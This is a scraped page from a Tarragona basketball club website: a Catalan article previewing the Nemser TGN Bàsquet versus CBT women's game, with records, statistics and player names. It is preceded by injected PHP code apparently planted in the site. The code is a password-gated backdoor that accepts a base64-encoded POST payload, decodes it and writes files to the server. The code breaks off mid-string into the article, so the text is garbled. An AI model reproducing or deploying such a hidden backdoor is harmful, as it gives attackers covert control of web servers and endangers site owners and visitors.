function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet rep el CBT en el duel tarragoní del bàsquet femení per excel·lència (dissabte, 18.30 h) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet rep el CBT en el duel tarragoní del bàsquet femení per excel·lència (dissabte, 18.30 h)

By
Updated: abril 30, 2015

En el millor moment possible, en una de les millors temporades de la seva història, el Nemser TGN Bàsquet rep l’etern rival, el CBT (dissabte, 18.30 h) en un partit que servirà per veure el millor matx de bàsquet femení que es pot disputar ara mateix a la ciutat de Tarragona. L’enfrontament, entre dos equips que estan fent una temporada esplèndida, podria permetre el conjunt lila aconseguir la dotzena victòria consecutiva, una fita mai assolida pel TGN Bàsquet en el seu sènior femení en la primera catalana i que posaria la cirereta en una segona volta de somni.

El Nemser TGN Bàsquet s’ha convertit en l’equip més temible i en forma de la competició amb aquesta ratxa sensacional d’11 triomfs consecutius i, tot i la solvència del CBT, segon classificat (22 victòries i 5 derrotes), aspira a revenjar-se del partit de la primera volta, quan va perdre clarament al pavelló del Serrallo (74-51). L’equip que entrena Jordi Hernández és actualment el quart classificat de la lliga amb un balanç de 18 victòries i 9 derrotes i, amb aquesta posició, iguala la millor classificació de sempre de la història del club, de fa dues temporades, quan el conjunt entrenat per Juan Carlos Arjona va acabar en quarta posició amb un balanç, això sí, de 22 victòries i 8 derrotes. D’aquesta manera, l’equip d’Hernández, si guanya els tres partits que li falten, es quedarà a un triomf del rècord d’Arjona. Amb tot, podria millorar la seva classificació. Això, però, no depèn del TGN Bàsquet exclusivament, perquè necessita guanyar els tres partits i que el Barça Santfeliuenc els perdi tots (tercer classificat amb 21 i 6). Hi hauria empat, però el conjunt lila li té el l’average guanyat.

El TGN Bàsquet és el segon millor atac de la lliga (61,37 punts per partit) i la novena millor defensa (55,03 punts encaixats). El CBT, per la seva banda, és el quart millor atac (56,59 punts) i la tercera millor defensa (49,07 punts encaixats).

Per vèncer el CBT, el Nemser TGN Bàsquet haurà d’exhibir el millor d’ell mateix: la velocitat de Gina Fort, l’habilitat d’Anais Muñoz, el sacrifici de Marina Piñol, el caràcter de Laura Vilamajor, l’espurna d’Anna Garcia, la sang freda d’Esther Cabré, el do de l’oportunitat d’Irene Villegas, la intel·ligència d’Ona Fort, la lluita de Laura Martínez, la punteria de Montse Martí, la brega de Julia Gómez, la il·lusió de Laura López i el talent i els centímetres d’Ester Farré.

El ritme de joc serà cabdal per decidir el partit contra un rival, el CBT, que té en l’escorta Alicia Villegas (germana d’Irene Villegas), la base Laura Pascual i la pivot Anna Pocino, les seves millors jugadores.

Serà un partit apassionant i d’alt nivell en què el Nemser TGN Bàsquet ja somia en aconseguir la fita de les dotze victòries seguides.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *